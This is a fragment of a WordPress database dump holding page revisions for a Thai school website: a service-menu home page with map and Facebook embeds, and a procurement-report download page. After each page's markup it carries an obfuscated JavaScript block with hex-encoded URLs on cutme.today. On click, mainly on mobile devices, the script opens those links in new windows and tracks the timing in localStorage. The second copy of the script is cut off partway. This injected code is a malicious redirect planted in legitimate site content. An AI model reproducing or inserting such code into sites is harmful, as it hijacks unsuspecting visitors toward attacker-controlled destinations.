{\"uniqueID\":\"14_74522c-22\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_df8487-4e\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_df8487-4e\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/tabs {\"uniqueID\":\"14_8c5230-93\",\"tabCount\":2,\"currentTab\":2,\"contentBgColor\":\"rgba(171,184,195,0.02)\",\"contentBorderStyles\":[{\"top\":[\"#bcbcbc\",\"\",1],\"right\":[\"#bcbcbc\",\"\",1],\"bottom\":[\"#bcbcbc\",\"\",1],\"left\":[\"#bcbcbc\",\"\",1],\"unit\":\"px\"}],\"tabAlignment\":\"center\",\"titles\":[{\"text\":\"E-SERVICE\",\"icon\":\"fe_box\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"เมนูระบบบริการ\",\"icon\":\"fe_airplay\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#000000\",\"titleColorHover\":\"#f78da7\",\"titleColorActive\":\"#ff6900\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"titleBgHover\":\"#ffffff\",\"titleBgActive\":\"#ffffff\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#8ed1fc\",\"titleBorderActive\":\"#8ed1fc\",\"titleBorderWidth\":[1,1,0,1],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,-1,0],\"size\":\"1.299\",\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"widthType\":\"percent\",\"tabWidth\":[3,\"\",\"\"],\"gutter\":[0,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id14_8c5230-93 kt-tabs-has-2-tabs kt-active-tab-2 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-center \"><ul class=\"kt-tabs-title-list kb-tabs-list-columns kb-tab-title-columns-3\"><li id=\"tab-e-service\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-e-service\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_box\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-SERVICE</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_airplay\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">เมนูระบบบริการ</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"_c20813-1f\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab_c20813-1f\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":723,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=700\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย.png\" alt=\"\" class=\"wp-image-723\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":724,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด.png\" alt=\"\" class=\"wp-image-724\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":725,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม.png\" alt=\"\" class=\"wp-image-725\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"_cc83b8-a1\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab_cc83b8-a1\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":726,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/SLIP-SSK-1.webp\" alt=\"\" class=\"wp-image-726\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":729,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=748\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-1.png\" alt=\"\" class=\"wp-image-729\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":808,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=810\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือ.png\" alt=\"\" class=\"wp-image-808\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":727,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/smss-ssk1.webp\" alt=\"\" class=\"wp-image-727\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":730,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/5.png\" alt=\"\" class=\"wp-image-730\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":728,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/admss.webp\" alt=\"\" class=\"wp-image-728\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":731,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/6.png\" alt=\"\" class=\"wp-image-731\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-08-15 09:35:55','2024-08-15 02:35:55','',14,'http://pakhaeng.ssk.in.th/?p=839',0,'revision','',0),
(840,1,'2024-08-15 11:31:04','2024-08-15 04:31:04','<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:html -->\n<iframe src=\"https://onedrive.live.com/embed?resid=204B2AF26790FE9B%21142&authkey=!AKgnNha0_TYdbgU&em=2\" width=\"1500\" height=\"500\" frameborder=\"0\" scrolling=\"no\"></iframe>\n<!-- /wp:html --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:file {\"id\":843,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/o14รายงานการจัดซื้อจัดจ้างหรือจัดหาพัสดุ-1.xlsx\"} -->\n<div class=\"wp-block-file\"><a id=\"wp-block-file--media-a0ce0c15-551b-4884-86a1-e38f6dd2f6cb\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/o14รายงานการจัดซื้อจัดจ้างหรือจัดหาพัสดุ-1.xlsx\">รายงานการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/o14รายงานการจัดซื้อจัดจ้างหรือจัดหาพัสดุ-1.xlsx\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-a0ce0c15-551b-4884-86a1-e38f6dd2f6cb\">Download</a></div>\n<!-- /wp:file -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const 